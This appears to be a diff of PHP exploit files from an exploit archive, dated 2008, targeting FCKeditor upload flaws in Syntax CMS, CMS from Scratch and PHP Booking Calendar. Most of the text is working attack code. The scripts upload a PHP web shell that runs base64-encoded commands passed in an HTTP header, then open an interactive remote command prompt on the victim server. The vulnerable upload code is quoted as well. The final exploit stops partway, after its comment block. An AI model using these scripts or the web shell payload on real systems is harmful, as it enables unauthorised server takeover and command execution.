+		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-		$packet.= "Connection: close\r\n\r\n";
+		$packet.= "Connection: close\r\n\r\n";
-		$output = http_send($host, $packet);
+		$output = http_send($host, $packet);
-		if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
+		if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
-		$shell = explode("_code_", $output);
+		$shell = explode("_code_", $output);
-		print "\n{$shell[1]}";
+		print "\n{$shell[1]}";
-	}
+	}
-	else break;
+	else break;
-}
+}
-
+
-?>
+?>
-
+
-# milw0rm.com [2008-05-14]
+# milw0rm.com [2008-05-14]
--- a/platforms/php/webapps/5688.php
+++ b/platforms/php/webapps/5688.php
@ -1,144 +1,144 @@
-<?php
+<?php
-/*
+/*
- --------------------------------------------------------------
+ --------------------------------------------------------------
- Syntax CMS <=  1.3 (fckeditor) Arbitrary File Upload Exploit
+ Syntax CMS <=  1.3 (fckeditor) Arbitrary File Upload Exploit
- --------------------------------------------------------------
+ --------------------------------------------------------------
- 
+ 
- Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For the Exploit Code
+ Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For the Exploit Code
- 
+ 
- author...: Stack
+ author...: Stack
- mail.....: Ev!L
+ mail.....: Ev!L
- descr:
+ descr:
-        if the web site change the name of path or path is /public/  you can delet /public/ in the exploit
+        if the web site change the name of path or path is /public/  you can delet /public/ in the exploit
-        in the line :
+        in the line :
-        "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php
+        "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php
- [-] vulnerable code in /public/fckeditor/editor/filemanager/upload/php/upload.php
+ [-] vulnerable code in /public/fckeditor/editor/filemanager/upload/php/upload.php
- 
+ 
- 41. // Get the posted file.
+ 41. // Get the posted file.
- 42. $oFile = $_FILES['NewFile'] ;
+ 42. $oFile = $_FILES['NewFile'] ;
- 43. 
+ 43. 
- 44. // Get the uploaded file name and extension.
+ 44. // Get the uploaded file name and extension.
- 45. $sFileName = $oFile['name'] ;
+ 45. $sFileName = $oFile['name'] ;
- 46. $sOriginalFileName = $sFileName ;
+ 46. $sOriginalFileName = $sFileName ;
- 47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
+ 47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
- 48. $sExtension = strtolower( $sExtension ) ;
+ 48. $sExtension = strtolower( $sExtension ) ;
- 49. 
+ 49. 
- 50. // The the file type (from the QueryString, by default 'File').
+ 50. // The the file type (from the QueryString, by default 'File').
- 51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
+ 51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
- 52. 
+ 52. 
- 53. // Check if it is an allowed type.
+ 53. // Check if it is an allowed type.
- 54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
+ 54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
- 55.     SendResults( 1, '', '', 'Invalid type specified' ) ;
+ 55.     SendResults( 1, '', '', 'Invalid type specified' ) ;
- 56. 
+ 56. 
- 57. // Get the allowed and denied extensions arrays.
+ 57. // Get the allowed and denied extensions arrays.
- 58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
+ 58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
- 59. $arDenied = $Config['DeniedExtensions'][$sType] ;
+ 59. $arDenied = $Config['DeniedExtensions'][$sType] ;
- 60. 
+ 60. 
- 61. // Check if it is an allowed extension.
+ 61. // Check if it is an allowed extension.
- 62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
+ 62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
- 63.  SendResults( '202' ) ;
+ 63.  SendResults( '202' ) ;
- 64. 
+ 64. 
- 65. $sErrorNumber = '0' ;
+ 65. $sErrorNumber = '0' ;
- 66. $sFileUrl  = '' ;
+ 66. $sFileUrl  = '' ;
- 67. 
+ 67. 
- 68. // Initializes the counter used to rename the file, if another one with the same name already exists.
+ 68. // Initializes the counter used to rename the file, if another one with the same name already exists.
- 69. $iCounter = 0 ;
+ 69. $iCounter = 0 ;
- 70. 
+ 70. 
- 71. // The the target directory.
+ 71. // The the target directory.
- 72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
+ 72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
- 73.  $sServerDir = $Config['UserFilesAbsolutePath'] ;
+ 73.  $sServerDir = $Config['UserFilesAbsolutePath'] ;
- 74. else
+ 74. else
- 75.  //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
+ 75.  //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
- 76.  $sServerDir = $Config["UserFilesPath"] ;
+ 76.  $sServerDir = $Config["UserFilesPath"] ;
- 77. 
+ 77. 
- 78. while ( true )
+ 78. while ( true )
- 79. {
+ 79. {
- 80.  // Compose the file path.
+ 80.  // Compose the file path.
- 81.  $sFilePath = $sServerDir . $sFileName ;
+ 81.  $sFilePath = $sServerDir . $sFileName ;
- 82. 
+ 82. 
- 83.  // If a file with that name already exists.
+ 83.  // If a file with that name already exists.
- 84.  if ( is_file( $sFilePath ) )
+ 84.  if ( is_file( $sFilePath ) )
- 85.  {
+ 85.  {
- 86.   $iCounter++ ;
+ 86.   $iCounter++ ;
- 87.   $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
+ 87.   $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
- 88.   $sErrorNumber = '201' ;
+ 88.   $sErrorNumber = '201' ;
- 89.  }
+ 89.  }
- 90.  else
+ 90.  else
- 91.  {
+ 91.  {
- 92.   move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
+ 92.   move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
- 93. 
+ 93. 
- 94.   if ( is_file( $sFilePath ) )
+ 94.   if ( is_file( $sFilePath ) )
- 95.   {
+ 95.   {
- 96.    $oldumask = umask(0) ;
+ 96.    $oldumask = umask(0) ;
- 97.    chmod( $sFilePath, 0777 ) ;
+ 97.    chmod( $sFilePath, 0777 ) ;
- 98.    umask( $oldumask ) ;
+ 98.    umask( $oldumask ) ;
- 99.   }
+ 99.   }
- 100.   
+ 100.   
- 101.   $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
+ 101.   $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
- 102. 
+ 102. 
- 103.   break ;
+ 103.   break ;
- 
+ 
- with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code 
+ with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code 
-*/
+*/
-error_reporting(0);
+error_reporting(0);
-set_time_limit(0);
+set_time_limit(0);
-ini_set("default_socket_timeout", 5);
+ini_set("default_socket_timeout", 5);
-function http_send($host, $packet)
+function http_send($host, $packet)
-{
+{
- $sock = fsockopen($host, 80);
+ $sock = fsockopen($host, 80);
- while (!$sock)
+ while (!$sock)
- {
+ {
-  print "\n[-] No response from {$host}:80 Trying again...";
+  print "\n[-] No response from {$host}:80 Trying again...";
-  $sock = fsockopen($host, 80);
+  $sock = fsockopen($host, 80);
- }
+ }
- fputs($sock, $packet);
+ fputs($sock, $packet);
- while (!feof($sock)) $resp .= fread($sock, 1024);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
- fclose($sock);
+ fclose($sock);
- return $resp;
+ return $resp;
-}
+}
-print "\n+------------------------------------------------------------+";
+print "\n+------------------------------------------------------------+";
-print "\n| Syntax CMS <=  1.3 Arbitrary File Upload Exploit by Stack  |";
+print "\n| Syntax CMS <=  1.3 Arbitrary File Upload Exploit by Stack  |";
-print "\n+------------------------------------------------------------+\n";
+print "\n+------------------------------------------------------------+\n";
-if ($argc < 2)
+if ($argc < 2)
-{
+{
- print "\nUsage......: php $argv[0] host path";
+ print "\nUsage......: php $argv[0] host path";
- print "\nExample....: php $argv[0] localhost /Syntax/\n";
+ print "\nExample....: php $argv[0] localhost /Syntax/\n";
- die();
+ die();
-}
+}
-$host = $argv[1];
+$host = $argv[1];
-$path = $argv[2];
+$path = $argv[2];
-$data  = "--12345\r\n";
+$data  = "--12345\r\n";
-$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
+$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
-$data .= "Content-Type: application/octet-stream\r\n\r\n";
+$data .= "Content-Type: application/octet-stream\r\n\r\n";
-$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
+$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
-$data .= "--12345--\r\n";
+$data .= "--12345--\r\n";
-$packet  = "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
+$packet  = "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
+$packet .= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($data)."\r\n";
+$packet .= "Content-Length: ".strlen($data)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-$packet .= "Connection: close\r\n\r\n";
+$packet .= "Connection: close\r\n\r\n";
-$packet .= $data;
+$packet .= $data;
-preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
+preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
-if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
+if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
-else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
+else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
-define(STDIN, fopen("php://stdin", "r"));
+define(STDIN, fopen("php://stdin", "r"));
-while(1)
+while(1)
-{
+{
- print "\nstack-shell# ";
+ print "\nstack-shell# ";
- $cmd = trim(fgets(STDIN));
+ $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
+ if ($cmd != "exit")
- {
+ {
-  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
+  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
-  $packet.= "Host: {$host}\r\n";
+  $packet.= "Host: {$host}\r\n";
-  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-  $packet.= "Connection: close\r\n\r\n";
+  $packet.= "Connection: close\r\n\r\n";
-  $output = http_send($host, $packet);
+  $output = http_send($host, $packet);
-  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
+  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
-  $shell = explode("_code_", $output);
+  $shell = explode("_code_", $output);
-  print "\n{$shell[1]}";
+  print "\n{$shell[1]}";
- }
+ }
- else break;
+ else break;
-}
+}
-?>
+?>
-
+
-# milw0rm.com [2008-05-29]
+# milw0rm.com [2008-05-29]
--- a/platforms/php/webapps/5691.php
+++ b/platforms/php/webapps/5691.php
@ -1,133 +1,133 @@
-<?php
+<?php
-
+
-/*
+/*
-	-----------------------------------------------------------------
+	-----------------------------------------------------------------
-	CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit
+	CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit
-	-----------------------------------------------------------------
+	-----------------------------------------------------------------
-	
+	
-	author...: EgiX
+	author...: EgiX
-	mail.....: n0b0d13s[at]gmail[dot]com
+	mail.....: n0b0d13s[at]gmail[dot]com
-	
+	
-	link.[1].: http://cmsfromscratch.com/
+	link.[1].: http://cmsfromscratch.com/
-	link.[2].: http://cmsfromscratch.googlecode.com/files/cmsfs114b.tgz (tested package)
+	link.[2].: http://cmsfromscratch.googlecode.com/files/cmsfs114b.tgz (tested package)
-
+
-	[-] vulnerable code in /cms/FCKeditor/editor/filemanager/connectors/php/config.php
+	[-] vulnerable code in /cms/FCKeditor/editor/filemanager/connectors/php/config.php
-	
+	
-	27.	// SECURITY: You must explicitelly enable this "connector". (Set it to "true").
+	27.	// SECURITY: You must explicitelly enable this "connector". (Set it to "true").
-	28.	// WARNING: don't just set "ConfigIsEnabled = true", you must be sure that only 
+	28.	// WARNING: don't just set "ConfigIsEnabled = true", you must be sure that only 
-	29.	//		authenticated users can access this file or use some kind of session checking.
+	29.	//		authenticated users can access this file or use some kind of session checking.
-	30.	$Config['Enabled'] = true ; <======
+	30.	$Config['Enabled'] = true ; <======
-	31.	
+	31.	
-	32.	$path = $_SERVER["REQUEST_URI"] ;
+	32.	$path = $_SERVER["REQUEST_URI"] ;
-	33.	$relativePathFromWebServerRoot =  substr($path, 0, strpos($path, "/", 1) );
+	33.	$relativePathFromWebServerRoot =  substr($path, 0, strpos($path, "/", 1) );
-	34.	// Coming out as /CMS, why???
+	34.	// Coming out as /CMS, why???
-	35.	
+	35.	
-	36.	
+	36.	
-	37.	
+	37.	
-	38.	// Path to user files relative to the document root.
+	38.	// Path to user files relative to the document root.
-	39.	// This is what is inserted into the HTML markup
+	39.	// This is what is inserted into the HTML markup
-	40.	$Config['UserFilesPath'] = urldecode(rtrim(str_replace('cms/FCKeditor/editor/filemanager/connectors/php', '', dirname($_SERVER['SCRIPT_NAME'])), '/')) ;
+	40.	$Config['UserFilesPath'] = urldecode(rtrim(str_replace('cms/FCKeditor/editor/filemanager/connectors/php', '', dirname($_SERVER['SCRIPT_NAME'])), '/')) ;
-	41.	if ($Config['UserFilesPath'] == '') $Config['UserFilesPath'] = '/' ;
+	41.	if ($Config['UserFilesPath'] == '') $Config['UserFilesPath'] = '/' ;
-	42.	
+	42.	
-	43.	// Fill the following value it you prefer to specify the absolute path for the user files directory. Useful if you are using a virtual directory, symbolic link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
+	43.	// Fill the following value it you prefer to specify the absolute path for the user files directory. Useful if you are using a virtual directory, symbolic link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
-	44.	// Attention: The above 'UserFilesPath' must point to the same directory.
+	44.	// Attention: The above 'UserFilesPath' must point to the same directory.
-	45.	// BH note: This is used for browsing the server.. should equate to the real path of the folder where /cms/ is installed
+	45.	// BH note: This is used for browsing the server.. should equate to the real path of the folder where /cms/ is installed
-	46.	$Config['UserFilesAbsolutePath'] = realpath('../../../../../../') ;
+	46.	$Config['UserFilesAbsolutePath'] = realpath('../../../../../../') ;
-	47.	
+	47.	
-	48.	// Due to security issues with Apache modules, it is reccomended to leave the following setting enabled.
+	48.	// Due to security issues with Apache modules, it is reccomended to leave the following setting enabled.
-	49.	$Config['ForceSingleExtension'] = true ;
+	49.	$Config['ForceSingleExtension'] = true ;
-	50.	// Perform additional checks for image files
+	50.	// Perform additional checks for image files
-	51.	// if set to true, validate image size (using getimagesize)
+	51.	// if set to true, validate image size (using getimagesize)
-	52.	$Config['SecureImageUploads'] = true;
+	52.	$Config['SecureImageUploads'] = true;
-	53.	// What the user can do with this connector
+	53.	// What the user can do with this connector
-	54.	$Config['ConfigAllowedCommands'] = array('QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder') ;
+	54.	$Config['ConfigAllowedCommands'] = array('QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder') ;
-	55.	// Allowed Resource Types
+	55.	// Allowed Resource Types
-	56.	$Config['ConfigAllowedTypes'] = array('File', 'Image', 'Flash', 'Media') ;
+	56.	$Config['ConfigAllowedTypes'] = array('File', 'Image', 'Flash', 'Media') ;
-	57.	// For security, HTML is allowed in the first Kb of data for files having the following extensions only.
+	57.	// For security, HTML is allowed in the first Kb of data for files having the following extensions only.
-	58.	$Config['HtmlExtensions'] = array("html", "htm", "xml", "xsd", "txt", "js") ;
+	58.	$Config['HtmlExtensions'] = array("html", "htm", "xml", "xsd", "txt", "js") ;
-	59.	
+	59.	
-	60.	$Config['AllowedExtensions']['File']	= array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'php', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
+	60.	$Config['AllowedExtensions']['File']	= array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'php', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
-	61.	$Config['DeniedExtensions']['File']		= array() ; <========
+	61.	$Config['DeniedExtensions']['File']		= array() ; <========
-	62.	$Config['FileTypesPath']['File']		= $Config['UserFilesPath'] ;
+	62.	$Config['FileTypesPath']['File']		= $Config['UserFilesPath'] ;
-	63.	$Config['FileTypesAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
+	63.	$Config['FileTypesAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
-	64.	$Config['QuickUploadPath']['File']		= $Config['UserFilesPath'] ;
+	64.	$Config['QuickUploadPath']['File']		= $Config['UserFilesPath'] ;
-	65.	$Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
+	65.	$Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
-
+
-	with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to
+	with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to
-	$Config['AllowedExtensions']['File'] array, used in IsAllowedExt() function to check the file's extension, contains also .php extension
+	$Config['AllowedExtensions']['File'] array, used in IsAllowedExt() function to check the file's extension, contains also .php extension
-*/
+*/
-
+
-error_reporting(0);
+error_reporting(0);
-set_time_limit(0);
+set_time_limit(0);
-ini_set("default_socket_timeout", 5);
+ini_set("default_socket_timeout", 5);
-
+
-function http_send($host, $packet)
+function http_send($host, $packet)
-{
+{
-	$sock = fsockopen($host, 80);
+	$sock = fsockopen($host, 80);
-	while (!$sock)
+	while (!$sock)
-	{
+	{
-		print "\n[-] No response from {$host}:80 Trying again...";
+		print "\n[-] No response from {$host}:80 Trying again...";
-		$sock = fsockopen($host, 80);
+		$sock = fsockopen($host, 80);
-	}
+	}
-	fputs($sock, $packet);
+	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
+	fclose($sock);
-	return $resp;
+	return $resp;
-}
+}
-
+
-print "\n+---------------------------------------------------------------+";
+print "\n+---------------------------------------------------------------+";
-print "\n| CMS from Scratch <= 1.1.3 Remote Shell Upload Exploit by EgiX |";
+print "\n| CMS from Scratch <= 1.1.3 Remote Shell Upload Exploit by EgiX |";
-print "\n+---------------------------------------------------------------+\n";
+print "\n+---------------------------------------------------------------+\n";
-
+
-if ($argc < 3)
+if ($argc < 3)
-{
+{
-	print "\nUsage......: php $argv[0] host path";
+	print "\nUsage......: php $argv[0] host path";
-	print "\nExample....: php $argv[0] localhost /";
+	print "\nExample....: php $argv[0] localhost /";
-	print "\nExample....: php $argv[0] localhost /cms114/\n";
+	print "\nExample....: php $argv[0] localhost /cms114/\n";
-	die();
+	die();
-}
+}
-
+
-$host = $argv[1];
+$host = $argv[1];
-$path = $argv[2];
+$path = $argv[2];
-
+
-$data  = "--12345\r\n";
+$data  = "--12345\r\n";
-$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php\"\r\n";
+$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php\"\r\n";
-$data .= "Content-Type: unknown/unknown\r\n\r\n";
+$data .= "Content-Type: unknown/unknown\r\n\r\n";
-$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
+$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
-$data .= "--12345--\r\n";
+$data .= "--12345--\r\n";
-
+
-$packet  = "POST {$path}/cms/FCKeditor/editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.0\r\n";
+$packet  = "POST {$path}/cms/FCKeditor/editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
+$packet .= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($data)."\r\n";
+$packet .= "Content-Length: ".strlen($data)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-$packet .= "Connection: close\r\n\r\n";
+$packet .= "Connection: close\r\n\r\n";
-$packet .= $data;
+$packet .= $data;
-
+
-preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
+preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
-
+
-if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
+if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
-else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
+else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
-
+
-define(STDIN, fopen("php://stdin", "r"));
+define(STDIN, fopen("php://stdin", "r"));
-
+
-while(1)
+while(1)
-{
+{
-	print "\ncmsfs-shell# ";
+	print "\ncmsfs-shell# ";
-	$cmd = trim(fgets(STDIN));
+	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
+	if ($cmd != "exit")
-	{
+	{
-		$packet = "GET {$path}{$html[3]} HTTP/1.0\r\n";
+		$packet = "GET {$path}{$html[3]} HTTP/1.0\r\n";
-		$packet.= "Host: {$host}\r\n";
+		$packet.= "Host: {$host}\r\n";
-		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-		$packet.= "Connection: close\r\n\r\n";
+		$packet.= "Connection: close\r\n\r\n";
-		$output = http_send($host, $packet);
+		$output = http_send($host, $packet);
-		if (!eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
+		if (!eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
-		$shell = explode("_code_", $output);
+		$shell = explode("_code_", $output);
-		print "\n{$shell[1]}";
+		print "\n{$shell[1]}";
-	}
+	}
-	else break;
+	else break;
-}
+}
-
+
-?>
+?>
-
+
-# milw0rm.com [2008-05-29]
+# milw0rm.com [2008-05-29]
--- a/platforms/php/webapps/5697.php
+++ b/platforms/php/webapps/5697.php
@ -1,137 +1,137 @@
-<?php
+<?php
-/*
+/*
- --------------------------------------------------------------
+ --------------------------------------------------------------
- PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit
+ PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit
- --------------------------------------------------------------
+ --------------------------------------------------------------
- 
+ 
-  Special thnx for : Egix
+  Special thnx for : Egix
- [-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
+ [-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
- 
+ 
- 41. // Get the posted file.
+ 41. // Get the posted file.
- 42. $oFile = $_FILES['NewFile'] ;
+ 42. $oFile = $_FILES['NewFile'] ;
- 43.
+ 43.
- 44. // Get the uploaded file name and extension.
+ 44. // Get the uploaded file name and extension.
- 45. $sFileName = $oFile['name'] ;
+ 45. $sFileName = $oFile['name'] ;
- 46. $sOriginalFileName = $sFileName ;
+ 46. $sOriginalFileName = $sFileName ;
- 47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
+ 47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
- 48. $sExtension = strtolower( $sExtension ) ;
+ 48. $sExtension = strtolower( $sExtension ) ;
- 49.
+ 49.
- 50. // The the file type (from the QueryString, by default 'File').
+ 50. // The the file type (from the QueryString, by default 'File').
- 51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
+ 51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
- 52.
+ 52.
- 53. // Check if it is an allowed type.
+ 53. // Check if it is an allowed type.
- 54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
+ 54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
- 55.     SendResults( 1, '', '', 'Invalid type specified' ) ;
+ 55.     SendResults( 1, '', '', 'Invalid type specified' ) ;
- 56.
+ 56.
- 57. // Get the allowed and denied extensions arrays.
+ 57. // Get the allowed and denied extensions arrays.
- 58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
+ 58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
- 59. $arDenied = $Config['DeniedExtensions'][$sType] ;
+ 59. $arDenied = $Config['DeniedExtensions'][$sType] ;
- 60.
+ 60.
- 61. // Check if it is an allowed extension.
+ 61. // Check if it is an allowed extension.
- 62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
+ 62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
- 63.  SendResults( '202' ) ;
+ 63.  SendResults( '202' ) ;
- 64.
+ 64.
- 65. $sErrorNumber = '0' ;
+ 65. $sErrorNumber = '0' ;
- 66. $sFileUrl  = '' ;
+ 66. $sFileUrl  = '' ;
- 67.
+ 67.
- 68. // Initializes the counter used to rename the file, if another one with the same name already exists.
+ 68. // Initializes the counter used to rename the file, if another one with the same name already exists.
- 69. $iCounter = 0 ;
+ 69. $iCounter = 0 ;
- 70.
+ 70.
- 71. // The the target directory.
+ 71. // The the target directory.
- 72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
+ 72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
- 73.  $sServerDir = $Config['UserFilesAbsolutePath'] ;
+ 73.  $sServerDir = $Config['UserFilesAbsolutePath'] ;
- 74. else
+ 74. else
- 75.  //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
+ 75.  //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
- 76.  $sServerDir = $Config["UserFilesPath"] ;
+ 76.  $sServerDir = $Config["UserFilesPath"] ;
- 77.
+ 77.
- 78. while ( true )
+ 78. while ( true )
- 79. {
+ 79. {
- 80.  // Compose the file path.
+ 80.  // Compose the file path.
- 81.  $sFilePath = $sServerDir . $sFileName ;
+ 81.  $sFilePath = $sServerDir . $sFileName ;
- 82.
+ 82.
- 83.  // If a file with that name already exists.
+ 83.  // If a file with that name already exists.
- 84.  if ( is_file( $sFilePath ) )
+ 84.  if ( is_file( $sFilePath ) )
- 85.  {
+ 85.  {
- 86.   $iCounter++ ;
+ 86.   $iCounter++ ;
- 87.   $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
+ 87.   $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
- 88.   $sErrorNumber = '201' ;
+ 88.   $sErrorNumber = '201' ;
- 89.  }
+ 89.  }
- 90.  else
+ 90.  else
- 91.  {
+ 91.  {
- 92.   move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
+ 92.   move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
- 93.
+ 93.
- 94.   if ( is_file( $sFilePath ) )
+ 94.   if ( is_file( $sFilePath ) )
- 95.   {
+ 95.   {
- 96.    $oldumask = umask(0) ;
+ 96.    $oldumask = umask(0) ;
- 97.    chmod( $sFilePath, 0777 ) ;
+ 97.    chmod( $sFilePath, 0777 ) ;
- 98.    umask( $oldumask ) ;
+ 98.    umask( $oldumask ) ;
- 99.   }
+ 99.   }
- 100.  
+ 100.  
- 101.   $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
+ 101.   $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
- 102.
+ 102.
- 103.   break ;
+ 103.   break ;
- 
+ 
- with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
+ with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
-*/
